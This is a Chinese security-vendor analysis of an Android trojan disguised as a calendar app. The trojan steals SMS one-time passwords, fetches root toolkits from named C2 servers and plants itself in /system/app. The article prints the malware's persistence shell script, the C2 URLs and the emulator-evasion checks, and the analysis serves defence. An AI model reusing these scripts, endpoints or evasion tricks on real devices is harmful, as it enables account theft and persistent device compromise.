“伪万年历” Root Exploit恶意应用分析

本文涉及的产品
密钥管理服务KMS,1000个密钥,100个凭据,1个月
简介:

 2015年10月12日 12:57  5642

一, 木马介绍

攻击者将木马制作成用户刚需应用,如色情类、生活服务类,或将恶意代码通过二次打包,注入到合法的应用当中,伪装成为合法应用,上传到android市场或某些论坛,诱导用户下载。一旦用户下载运行了此类应用,木马通过云端推送root 工具包,以及恶意应用;通过短信提取动态密码,第一时间发送给木马作者,直接造成财产损失、隐私泄露等;木马创建不死服务,后台root设备,成功root后将恶意应用植入系统分区,用户即使恢复出厂设置也无法完全卸载木马。具体执行过程如下图:

“伪万年历” Root Exploit恶意应用分析- 恶意Apk-阿里聚安全

    被感染应用以及恶意样本数量过千类,以下列出“万年历,清涩笑话,特实惠, 魅力女生动态桌面,开心乐消消-欢乐版,内涵壁纸,开心乐消消,全网充话费,极致腿模,好听音乐,HoloTorch,情趣内涵电台,Accurate Battery,Super Silent,心情天气”

“伪万年历” Root Exploit恶意应用分析-短信劫持-阿里聚安全

二,样本行为分析

    样本存在大量变种,以下对“伪万年历”样本进行行为分析。木马将恶意代码打包入正常应用。启动“伪

万年历”应用后,进入正常的日历界面,而应用的Application 类作为恶意代码入口点。

“伪万年历” Root Exploit恶意应用分析-root设备-阿里聚安全

2.1监听短信彩信,获取动态验证码

    提取短信中的动态密码,第一时间转发到指定号码并截断短信发送,这样用户将在不知情的情况下,大量账号被盗。拦截用户短信彩信,提取到的动态密码以及手机信息发送到云端服务器。直接造成财产损失,隐私泄露。

    木马动态注册短信监听广播,通过类加载反射等技术进行具体的监控操作。当触发短信消息事件时,木马会动态加载myjar.jar,反射调用smscheck函数。

“伪万年历” Root Exploit恶意应用分析-APK木马-阿里聚安全

                               图动态注册广播监听短信消息

“伪万年历” Root Exploit恶意应用分析-阿里-阿里聚安全

                              图动态加载dex,反射调用smscheck函数

    对smscheck函数分析,发现若拦截到的短信中存在动态密码,病毒会第一时间发送给指定号码,同时会将动态密码,以及当前手机信息作为参数post提交到云端服务器。也就是木马作者通过用户手机号码找回密码,这样轻松的盗取用户账号密码,而中马用户完全不知晓。

“伪万年历” Root Exploit恶意应用分析-root exploit-阿里聚安全

“伪万年历” Root Exploit恶意应用分析- 恶意Apk-阿里聚安全

    接下来过滤短信发送者,将短信内容,发送者手机号码,以及手机imsi等发post到指定服务器:

“伪万年历” Root Exploit恶意应用分析-短信劫持-阿里聚安全

                     图将拦截到短信发送到指定服务器


    跟踪发现服务器目录,存放了中马手机信息以及root手机的工具:

“伪万年历” Root Exploit恶意应用分析-root设备-阿里聚安全

 

2.2启动LocationService

a 监听广播,触发云端交互,下载root 工具包和推广的恶意应用

    LocationService开启任务线程,在任务线程里动态注册广播,监听网络变化,屏幕唤醒锁屏,应用安装卸载更新等,监控广播做为病毒行为触发点。获取手机信息做为post参数,上传到云端服务器。
(android.net.conn.CONNECTIVITY_CHANGE,android.intent.action.USER_PRESENT,android.intent.action.SCREEN_OFF,android.intent.action.SCREEN_ON,android.intent.action.PACKAGE_ADDED,android.intent.action.PACKAGE_CHANGED,              android.intent.action.PACKAGE_REPLACED,android.intent.action.PACKAGE_REMOVED)

以下是对病毒下载云端root 工具的分析:木马首先向服务器post手机的imei、imsi、分辨率、手机号等基本信息,服务器返回加密的url指令,解码url获取下载Root手机所需的busybox、su、install-recovery.sh等工具:


“伪万年历” Root Exploit恶意应用分析-APK木马-阿里聚安全

post 手机信息到服务器(http://api.wangyan9488.com:8285/api/getShell.jsp),返回加密url

“伪万年历” Root Exploit恶意应用分析-阿里-阿里聚安全

图服务器返回的加密url

 

    木马本地解密url,获取到root 工具下载源(http://222.21x.xxx.7:8661/apk/rootsheel/1438654068044948.jar),下载到手机后改名为“shellv5.jar”,其实是一压缩包:

“伪万年历” Root Exploit恶意应用分析-root exploit-阿里聚安全

shellv5.jar 里的文件 root 工具包

 

    采用同样的过程下载root sdk,访问服务器http://api.wangyan9488.com:8287/api/getAttach.jsp,获取加密url

 “伪万年历” Root Exploit恶意应用分析- 恶意Apk-阿里聚安全        

图加密root sdk url

    木马解密url,获取下载源(http://222.21x.xxx.x:8661/apk/dlapp/14386539787043206.jar)下载jar文件,下载到手机后改名为“dlv5.jar”。通过动态加载该文件中的dex文件,同时利用之前下载的工具获取Root权限,随后将同名文件名的apk文件植入到/system/app/下并安装。该apk伪装成系统“下载服务”,而自身是与母样本伪万年历相同行为的木马。


b强制激活设备管理,防止卸载

 

    利用设备管理器缺陷,在取消激活设备管理之前,DevicePolicyManagerService会调用应用的onDisableRequested方法获取取消激活的警示信息。下图可以发现病毒在发现取消激活时,会进行屏幕锁屏之后进入系统setting 页面,这样一旦用户激活设备将无法卸载。

“伪万年历” Root Exploit恶意应用分析-短信劫持-阿里聚安全
                                                  图取消设备管理时屏幕锁屏

c 最后启动另外一个核心服务blueService

“伪万年历” Root Exploit恶意应用分析-root设备-阿里聚安全

                                                  图启动BlueService服务

2.3 blueService服务


    a 强制安装ANDROID_SCREEN_ON_OFF.apk应用

伪装成系统“下载管理”应用,同样通过post手机信息到云端服务器,get加密后的url,然后本地解密url获取下载推广的应用。同样的代码模块激活设备管理防止卸载。

“伪万年历” Root Exploit恶意应用分析-APK木马-阿里聚安全


b root 手机

    下图为BlueService服务的任务线程,红色框动态注册RootReciver,当网络发生变化或手机锁屏唤醒时,在后台尝试root:

“伪万年历” Root Exploit恶意应用分析-阿里-阿里聚安全

                                                   图blueService服务任务线程代码

    检测14425728404326709.apk是否被安装,其实这是root之后安装到系统目录下的文件,root的最终目的就是将恶意应用植入system目录,伪装成系统应用,长期驻留用户设备。木马通过DexClassLoader加载云端配置的rootDex,随后反射调用getDex 函数进行root工作。下图动态加载dex,反射调用getDex:

“伪万年历” Root Exploit恶意应用分析-root exploit-阿里聚安全

                                图动态加载dex,反射调用getDex

将云端下载到sdcard/.xxx目录里的busybox,su  拷贝到应用文件目录,创建aa.xml文件表示开始进行root 工作。下图创建开始root文件:

“伪万年历” Root Exploit恶意应用分析- 恶意Apk-阿里聚安全

                                 图创建开始root的flag文件

将云端下载在xxx目录下的root 工具,拷贝到data/files目录下,并在files目录下创建psneuter.js

“伪万年历” Root Exploit恶意应用分析-短信劫持-阿里聚安全

图拷贝root 工具

    root成功后将14425728404326709.apk 安装到system/app目录并启动该应用。动态拦截发现,本次分析下载的root sdk 工具包,应该是刷机大师的MTK ROOT方案。由于云端配置灵活,下载获取的root工具包灵活(根据手机版本等信息,下载不同root工具包).

“伪万年历” Root Exploit恶意应用分析-root设备-阿里聚安全

图root 手机代码

“伪万年历” Root Exploit恶意应用分析-APK木马-阿里聚安全

1.suc f0h5zguZ9aJXbCZExMaN2kDhh6V0Uw== /system/bin/sh psneuter.js

2.suc al1s7jBFNtn9faBmC0Jb9A9Ns1GZSg== /system/bin/sh psneuter.js

3.suc HygZRm2IHTKWpp7Hll/sS0uY66xdcw== /system/bin/sh psneuter.js

成功root后执行psneuter.js,木马将成功伪装成系统应用隐藏在用户手机,即使恢复出厂设置也无法卸载。

psneuter.js文件内容

#!/system/bin/sh

mount -o rw,remount /system

/data/local/tmp/busybox mount -o rw,remount /system

cat /data/local/tmp/14425728404326709.apk > /system/app/14425728404326709.apk

chmod 0644 /system/app/14425728404326709.apk

pm install /system/app/14425728404326709.apk

mount -o ro,remount /system

/data/local/tmp/busybox mount -o ro,remount /system

echo "Now, script finish!”

“伪万年历” Root Exploit恶意应用分析-阿里-阿里聚安全

图 root成功木马伪装系统软件“下载服务”

c  不死服务LocationService, BlueService

    只要保证两大核心服务LocationService,BlueService 不死,就可以一直在后台执行恶意代码。木马在启动核型服务LocationService,BlueService的同时,会注册守护广播,保证核心服务一直启动。

“伪万年历” Root Exploit恶意应用分析-root exploit-阿里聚安全

图启动LocationService服务同时注册守护广播

守护服务的广播,通过监听屏幕开关、手机电量变化、时间更改,启动被保护的服务

“伪万年历” Root Exploit恶意应用分析- 恶意Apk-阿里聚安全

图守护广播监听的消息

三,变种追踪

      该样本存在大量变种,且都是由LocationService,BlueService核心服务演变而来,从最开始的恶意应用推广到云端root sdk配置,升级到通过短信盗号,对抗杀软检测在native层检测运行环境等。

对变种木马“内涵壁纸”样本分析,首先在native层检查运行环境,若不是模拟器才启动恶意广播。这样有效的躲避了动态引擎检测,以及逆向分析人员分析。

“伪万年历” Root Exploit恶意应用分析-短信劫持-阿里聚安全


图native层启动恶意广播

    模拟器检查,若木马运行环境在模拟器内,木马将不会启动恶意广播。模拟检查主要检查cpuinfo是否为goldfish,设备IDS是不是 “000000000000000” imsi id是不是“310260000000000“,手机运营商等。

“伪万年历” Root Exploit恶意应用分析-root设备-阿里聚安全

四,建议和解决方案

 4.1  使用加固手段增加被恶意者二次打包的成本:如使用阿里聚安全应用加固方案,无需开发者修改源代码或者二次开发,通过加壳,加密,逻辑混淆,代码隐藏等各类应用加固方法,防止应用被逆向分析,反编译,以及二次打包嵌入各类病毒广告等恶意代码。

4.2  用户下载应用请到官方网站或安全应用市场,切勿点击任何色情链接,尤其是短信、QQ、微信等聊天工具中不熟识的朋友发来的链接。

4.3  如果不确定手机是否毒,可以安装阿里钱盾等手机安全软件,对手机上的应用进行检测,防止高风险恶意应用的安装。





本文来自合作伙伴“阿里聚安全”.


相关文章
|
6天前
|
安全 Ubuntu Shell
深入解析 vsftpd 2.3.4 的笑脸漏洞及其检测方法
本文详细解析了 vsftpd 2.3.4 版本中的“笑脸漏洞”,该漏洞允许攻击者通过特定用户名和密码触发后门,获取远程代码执行权限。文章提供了漏洞概述、影响范围及一个 Python 脚本,用于检测目标服务器是否受此漏洞影响。通过连接至目标服务器并尝试登录特定用户名,脚本能够判断服务器是否存在该漏洞,并给出相应的警告信息。
119 84
|
3月前
|
安全
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
|
4月前
|
安全 网络协议 网络安全
Python 渗透测试:黑客内外网信息收集.(帮助 得到信息攻击计算机内外网.)
Python 渗透测试:黑客内外网信息收集.(帮助 得到信息攻击计算机内外网.)
46 0
|
SQL 缓存 网络协议
网络信息安全实验 — 网络攻击技术实验(Kali系统,John、lc7、arpspoof、ettercap、SQL注入...)
本人深感网络安全实验有点麻烦,花了一个晚上弄了部分,特此将笔记贡献造福后人,个人能力有限,还会继续更新。。。 汇报题目:**15分钟教你用 Python 写一个 arpspoof**(课件准备ing,如果弄完后续补上) 第一次网络安全实验(密码学)也是我做的,这里先放个自制工具:[Java实现密码学工具,集成了对称加密算法DES,AES,IDEA,公开加密算法RSA,ECC,散列算法MD5,SHA1,CRC32,以及RSA,DSA,ECDSA数字签名验证示例。](https://blog.csdn.net/weixin_43734095/article/details/105303562)
1466 0
网络信息安全实验 — 网络攻击技术实验(Kali系统,John、lc7、arpspoof、ettercap、SQL注入...)
|
网络协议 网络安全 数据安全/隐私保护
【渗透】爆破工具Hydra
Hydra是一款强大的工具,可以帮助用户快速地进行密码破解和暴力攻击。如果你看过我之前写的靶机视频,你就会发现,在用大字典时,相对于burp suite,Hydra的表现更为优异,那么我们就来深入了解一下这个爆破神器吧。
290 0
|
监控 安全 Windows
Metasploit -- 木马生成原理和方法
Metasploit -- 木马生成原理和方法
720 0
Metasploit -- 木马生成原理和方法
|
Shell 网络安全 API
迷糊的提权方式以及利用ssrf到最终提权靶机(一)
迷糊的提权方式以及利用ssrf到最终提权靶机
101 0
迷糊的提权方式以及利用ssrf到最终提权靶机(一)
|
安全 Java 应用服务中间件
迷糊的提权方式以及利用ssrf到最终提权靶机(二)
迷糊的提权方式以及利用ssrf到最终提权靶机
117 0
迷糊的提权方式以及利用ssrf到最终提权靶机(二)
|
Shell 应用服务中间件 网络安全
迷糊的提权方式以及利用ssrf到最终提权靶机(三)
迷糊的提权方式以及利用ssrf到最终提权靶机
167 0
迷糊的提权方式以及利用ssrf到最终提权靶机(三)
|
安全 Shell 数据安全/隐私保护
python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,因此也称为笑脸漏洞。
456 0
python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)